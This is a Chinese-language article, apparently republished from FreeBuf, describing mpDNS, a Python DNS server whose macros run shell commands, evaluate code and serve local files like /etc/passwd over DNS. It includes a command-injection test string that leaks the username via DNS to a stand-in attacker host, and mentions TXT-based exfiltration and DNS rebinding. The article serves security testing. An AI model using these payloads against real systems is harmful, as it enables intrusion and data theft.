27

mpDNS:Python实现的多功能DNS服务器

 5 years ago
source link: https://www.freebuf.com/sectool/196069.html?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

简单、可配置的“ clone和run ”DNS服务器,具有多种有用的功能。

适用于Python 2和3

names.db – >包含所有自定义记录(参见示例)

简单的通配符,如* .example.com

捕获unicode dns请求

自定义动作又称宏:

- {{shellexec::dig google.com +short}} – >执行shell命令并使用result响应 

- {{eval::res = '1.1.1.%d' % random.randint(0,256)}} - >评估你的python代码  

- {{file::/etc/passwd}} – >回复本地文件内容  

- {{resolve}} – >将DNS请求转发到本地系统DNS  

- {{resolve::example.com}} – >解析example.com而不是原始记录  

- {{echo}} – >回复对等地址  

- {{shellexec::echo %PEER% %QUERY%}} – >使用变量

支持的查询类型: ACNAMETXT

更新 names.db 记录而不重启/重新加载 ./mpdns.py -e

重度基于 https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

用法: ./mpdns.py

编辑 names.db./mpdns.py -e 无需重启

进攻和防守目的:

1.您需要一个轻量级的简单DNS服务器解决方案用于测试目的(不生产!)

2.测试Web应用程序中的各种盲注漏洞(例如/ping.php?ip=$(dig $(whoami).attacker.com))

3.在一个 TXT 查询中轻松渗透65K数据

4.DNS重新绑定

5.对特定查询执行自定义宏操作(在恶意软件分析实验室环境中很有用)

6.还有更多。它是高度可定制的。

安装

git clone https://github.com/nopernik/mpDNS

限制

1.由于UDP数据报限制为65535字节,DNS响应限制在约65200字节,   此限制适用于 TXT 分成256字节块的记录,直到响应达到最大允许值65200b,   因此 TXT 宏记录 {{file:localfile.txt}} 限制为65200字节。

2.不支持嵌套通配符 test.*.example.com

3. {{resolve::example.com}} 宏中不支持自定义DNS服务器解析程序

4. TTL 始终设为 0

例子

names.db示例:

# Empty configuration will result in empty but valid responses
#
# Unicode domain names are not supported but still can be catched by the server.
# for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response
passwd.example.com    TXT     {{file::/etc/passwd}}  #comments are ignored
shellexec            TXT     {{shellexec::whoami}}
eval                TXT     {{eval::import random; res = random.randint(1,500)}}
resolve1            A       {{resolve}}
resolve2            A       {{resolve::self}}      #same as previous
resolve3            A       {{resolve::example.com}}
blabla.com            A       5.5.5.5
*                    A       127.0.0.1
*.example.com        A        7.7.7.7
c1.example.com        CNAME    c2.example.com
c2.example.com        CNAME    c3.example.com
c3.example.com        CNAME    google.example.com
google.example.com    CNAME    google.com
test.example.com    A        8.8.8.8
google.com            A        {{resolve::self}}
notgoogle.com        A        {{resolve::google.com}}

使用names.db示例输出示例:

DB的定期解决方案: dig test.example.com @localhost 

;; ANSWER SECTION:
test.example.com.    0    IN    A    8.8.8.8

mpDNS输出: - Request from 127.0.0.1:57698 -> test.example.com.    -> 8.8.8.8 (A)

递归CNAME解析: dig c1.example.com @localhost 

;; QUESTION SECTION:
;c1.example.com.            IN    A
;; ANSWER SECTION:
c1.example.com.        0    IN    CNAME    c2.example.com.
c2.example.com.        0    IN    CNAME    c3.example.com.
c3.example.com.        0    IN    CNAME    google.example.com.
google.example.com.    0    IN    CNAME    google.com.
google.com.        0    IN    A    216.58.206.14

mpDNS输出:

- Request from 127.0.0.1:44120      -> c1.example.com.        -> c2.example.com (CNAME)
- Request from 127.0.0.1:44120      -> c2.example.com        -> c3.example.com (CNAME)
- Request from 127.0.0.1:44120      -> c3.example.com        -> google.example.com (CNAME)
- Request from 127.0.0.1:44120      -> google.example.com    -> google.com (CNAME)
- Request from 127.0.0.1:44120      -> google.com            -> {{resolve::self}} (A)

通配符解析: dig not-in-db.com @localhost 

;; ANSWER SECTION:
not-in-db.com.        0    IN    A    127.0.0.1

mpDNS输出: - Request from 127.0.0.1:38528 -> not-in-db.com.    -> 127.0.0.1 (A)

通配符子域解析: dig wildcard.example.com @localhost 

;; ANSWER SECTION:
wildcard.example.com.    0    IN    A    7.7.7.7

mpDNS输出: - Request from 127.0.0.1:39691 -> wildcard.example.com.    -> 7.7.7.7 (A)

转发请求宏: dig google.com @localhost 

;; ANSWER SECTION:
google.com.        0    IN    A    172.217.22.110

mpDNS输出: - Request from 127.0.0.1:53487 -> google.com.    -> {{resolve::self}} (A)

自定义域宏的转发请求: dig notgoogle.com @localhost 

;; ANSWER SECTION:
notgoogle.com.        0    IN    A    172.217.22.110

mpDNS输出: - Request from 127.0.0.1:47797 -> notgoogle.com.    -> {{resolve::google.com}} (A)

通过TXT查询文件内容宏: dig txt passwd.example.com @localhost 

;; ANSWER SECTION:
passwd.example.com.    0    IN    TXT    "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"

mpDNS输出: - Request from 127.0.0.1:38805 -> passwd.example.com.    -> ['root:x:0:0:root...(2808)'] (TXT)

通过TXT查询自定义python代码宏: dig txt eval @localhost 

;; ANSWER SECTION:
eval.            0    IN    TXT    "320"

mpDNS输出: - Request from 127.0.0.1:33821 -> eval.    -> ['320'] (TXT)

Shell命令宏通过TXT查询: dig txt shellexec @localhost 

;; ANSWER SECTION:
shellexec.        0    IN    TXT    "root"

mpDNS输出: - Request from 127.0.0.1:50262 -> shellexec.    -> ['root'] (TXT)

*参考来源 github ,由周大涛编译,转载请注明来自FreeBuf.COM。


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK